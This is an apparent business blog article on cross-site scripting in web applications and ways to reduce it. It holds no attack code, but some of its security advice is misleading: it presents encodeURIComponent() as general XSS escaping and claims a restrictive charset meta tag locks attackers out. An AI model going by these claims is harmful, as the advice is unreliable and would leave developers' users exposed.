There are many benefits to creating web applications for your business. Compared to traditional websites they are extremely versatile and attractive—having only static content in this day and age makes you look like a dinosaur. Security on the other hand isn’t always guaranteed and is a concern many businesses would do well to take it more seriously when constructing web apps—the same things that make them powerful also acts as a bridge for attackers.
When building a web application, it’s essential that you understand the variety of ways in which an attacker can harm you through it. You only need to miss one vulnerability to experience a data breach.
I’d strongly recommend you take a look at the Open Web Application Security Project, or OWASP Top 10. This is a nonprofit project that identifies the ten most critical security risks for web applications. OWASP is updated every few years, the link above is from 2017. Cross-Site Scripting is listed as application security threat 7 in their top 10 list.
There’s plenty of research to be done surrounding web application security, but you don’t always have time to do the research yourself. Therefore, it’s always a good idea to have a penetration tester onboard. When wanting to find out what security concerns are leaving you most at risk, it’s important you identify them at the source. Penetration testers are tasked with finding any security concerns specific to your business.
If you’re a startup and don’t have the ability to hire a specialist security testing role, ensure your developer or programmer sets adequate time aside for security concerns.
What Security Issue is Leaving Organizations Most Vulnerable?
In the past, many companies would understandably keep any information about breaches private. This kept reputations intact, but wasn’t the best way forward for identifying security threats, namely what was leaving organizations vulnerable. If you get burgled, the neighbourhood needs to know about it!
These days, things are better: we now have crowdsourced vulnerability detection organizations that collect data to identify the most common security concerns, keeping note of what steps have been taken to successfully or unsuccessfully deal with them.
An issue relating to web applications that continues to reappear again and again is cross-site scripting (XSS). XSS isn’t an issue that gets enough attention because it doesn’t result in large company data breaches. Instead, it uses company web apps as a springboard to attack end-users. For attackers, they represent lower rewards, but they’re able to be carried out against significantly more targets. It’s a flurry of blows rather than a single king hit, but it’ll take you down just as effectively—if your users get hacked because of your site, they’ll be understandably furious with you and you’ll bleed users.
Understanding Cross-Site Scripting in Web Applications
Cross-site scripting in web applications takes place when malicious code is injected into a benign website through vulnerabilities in a web application, a plugin or the web server where the code is hosted. A common XSS attack vector is when a developer forgets to put proper escape syntax around a comments field; this allows an attacker to place <script> tags in the comments like so:
Which will run and infect users who load the targeted page. These are particularly nasty because of the Same Origin Policy: if content a web app counts as ‘trusted’, then all code coming from it is trusted, regardless of whether it’s malicious or not. If an attacker can access legitimate pages via XSS attack, then they can circumvent a huge amount of user security. A common method is user submitted content, if one could pt malicious code into a comment for example, it would run on the browsers of those who viewed the comment, allowing the attacker to steal their session data and have access to the site as the victim, perhaps allowing them to see their info or make purchases as the victim.
Really, anywhere without proper input sanitization is vulnerable to this sort of injection, though there’s a few big ones we’re going to go over to help you really lock things down.
- Proper Escape Syntax
You can lock out 90% of web app XSS attacks by making sure you’ve written proper escape syntax. You’ll want to do this with ANY user input.
How you do that is going to depend on a lot on your codebase; I most often use the encodeURIComponent() function, which will replace selected characters with escape sequences and prevent malicious script from running.
- Crossing Boundaries Policy
A “crossing boundaries policy” forces users to re-enter their login details when moving to a webpage that contains sensitive information, even if they have a cookie for login details. This extra caution reduces the chances of an attacker accessing data if a session is hijacked. To reinforce this protection you can also add another function that terminates a session if devices at two different IP addresses are trying to access the same session.
- Limit Injection Possibility With the Right Meta Tag
By default, browsers won’t assume a certain charset, while some servers won’t allow a charset parameter to be sent. A charset determines how your site will be displayed to the user and what possible characters can influence its appearance. Therefore, it’s important you provide a meta tag for your webpages to limit what injections are actually possible. For example, see the following meta tag with the charset “ISO-8859-1”:
<META http-equiv=”Content-Type” content=”text/html; charset= ISO-8859-1″>
The charset ‘ISO-8859-1’ is usually sufficient enough for the majority of European languages. Hackers will often use characters from other languages or alphabets to circumvent filters, and this will automatically lock them out.
- Vulnerability Scanning Tools
An option for those with less of a technical background installing a vulnerability scanning tool. Such tools scan for cross-site scripting vulnerabilities as well as a range of other security issues such as: path traversal, command injection or SQL injection. There are plenty to choose from, some are free and others are subscription services that will offer more thorough scanning functionality.
Security should be a top priority in your web application and website. Complacency with security puts you and your users at risk and can result in serious financial or reputational consequences. XSS attacks aren’t the world-ending breach they were ten years ago during the SQL-injection apocalypse but they’re still common and devastating, and need to be taken seriously.
Of course, security is important in any development project, and XSS attacks primarily damage your users and bounce the harm back onto your indirectly. But, you also need to protect yourself from malicious intent, in doing so you are protecting your business. To get started, this article discusses seven ways you can stay anonymous online.